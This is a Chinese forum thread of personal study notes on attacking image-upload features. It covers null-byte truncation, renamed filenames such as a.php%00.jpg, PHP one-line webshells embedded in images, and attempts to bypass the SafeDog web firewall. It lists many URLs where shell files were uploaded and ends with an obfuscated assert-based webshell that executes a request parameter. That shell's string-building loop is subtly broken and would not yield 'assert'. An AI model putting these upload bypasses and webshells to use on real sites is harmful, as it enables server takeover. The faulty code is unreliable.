周大胖子 发表于 2019-6-2 23:58:16

上传文 测试学习记录

当字符有%00(空字节) 就会被服务器认作为结束符。

空字节漏洞存在:
        PHP 不同版本存在这个漏洞;
        不同函数也存在这个漏洞;例如 转码 urldecode()
       
       
        图片上传基本流程:
        1.图片是否正常上传;
        2.图片上传内容是否被感染(内容替换)
        3.上传的域名是否是目标服务器;
          3.1 如果不是那么判断图片服务器是否解析(php,asp....)
        4.上传的目录是否支持解析(php aspx jsp cfm ---)
       
                解释3与4: 所谓解析 就是判断目标服务器是否存在相应的代码运行环境
       
       
       
        文件截断上传
                走一遍视频后总结:
                目标:上传的文件尾缀为.php 的 可运行文件 ;
                前提条件:
                        1. 把图片右击用记事本打开,把PHP 一句话木马代码塞进去 再保存 ;
                        2. 文件成功上传 ;
                        3. 把上传的图片另存为存下来,再用编辑器打开, 看代码在不在【也就是被没被感染】,在就继续倒腾下面的
                手段:黑盒测试中,利用
                        1. 修改文件名: a.php%00.jpg、 a.php .jpg、 a.jpg%00.php 、 a.jpg .php
                        2. 修改hash 值: 把指定位置改成00   [可结合1 尝试]
                       
               
                获得图片路径
                http://www.huake94.top/da/data/attachment/forum/201905/27/225026svvnhvyvwsdnudpc.png【这是上传到 下面是ftp上传到】
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/5.png[小图模式 <是?的链接]
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/7.png[< 直议模式 图模式]
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/52.php[小图模式 <是?的链接 的PHP版本]
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/72.php【直接把7改成了php 文件】
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/2.php【直接连接】
               
                实际情况 ,在我链接的时候 提示: 服务器连接被重置; 反应为 安全狗
               
                参考资料: http://www.360doc.com/content/18/0213/19/30583588_729816778.shtml
               
                // 上述失败 采用变量方式 再尝试绕过PHP
               
                采用第二种方式
               
                一句话木马未改动版图片
               
                        http://a.wangjingting.top/upload/image/20190116/2.php[小图模式 <是?的链接]
               
                        http://a.wangjingting.top/upload/image/20190116/7.png[小图模式 <是?的链接]
               
                        http://a.wangjingting.top/upload/image/20190116/5.png[< 直议模式 图模式]
               
                        http://a.wangjingting.top/upload/image/20190116/52.php [小图模式 <是?的链接 的PHP版本]
               
                        http://a.wangjingting.top/upload/image/20190116/72.php【直接把7改成了php 文件】
               
                一句话木马 变量版 地址 【上述地址全部玩完,经检测 发现该变量版不行 倒是 7.png 可以访问, 特点: 被告该处了< 括号而不是编码?】
               
                        http://www.huake94.top/da/data/attachment/forum/201905/27/8.php【直接连接】
               
                        http://www.huake94.top/da/data/attachment/forum/201905/27/48.php【图片名称改掉】
               
                        http://www.huake94.top/da/data/attachment/forum/201905/27/48.png【直接是图片】
               
                        我的主机版
                       
                        http://a.wangjingting.top/upload/image/20190116/8.php【直接连接】
               
                        http://a.wangjingting.top/upload/image/20190116/48.php【图片名称改掉】
               
                        http://a.wangjingting.top/upload/image/20190116/48.png【直接是图片】
       
                参考文献: https://blog.csdn.net/cic10235/article/details/52104010【变量木马的制作 尝试绕过安全狗】
       
       
       
        选用第三种 来自乌云的 一句话木马去你奶奶个腿版 6.PHP
       
                参考文献:https://www.secpulse.com/archives/38355.html
       
                生成文件并上传:
               
                http://a.wangjingting.top/upload/image/20190116/6.php【直接连接】
               
                        http://a.wangjingting.top/upload/image/20190116/46.php【图片名称改掉】
               
                        http://a.wangjingting.top/upload/image/20190116/46.png【直接是图片】
       
       
       

周大胖子 发表于 2019-6-12 00:25:01

                                                               
        再次寻找 可以 过安全的一句话木马 https://www.freebuf.com/articles/web/125084.html        【这个是木马上传方式的整体思路】       


                        木马链接位置: http://a.wangjingting.top/upload/image/20190117/m.php
                        【
                        选用的语句4:
                                        <?php

        /*

        PHP一句话木马

        assert($string)

        */

        $arr = array('a','s','s','e','r','t');

        $func = '';

        for($i=0;$i<count($arr);$i++) {

        $func .= $func . $arr[$i];

        }

        $func($_REQUEST['c']);

        ?>
                        】
页: [1]
查看完整版本: 上传文 测试学习记录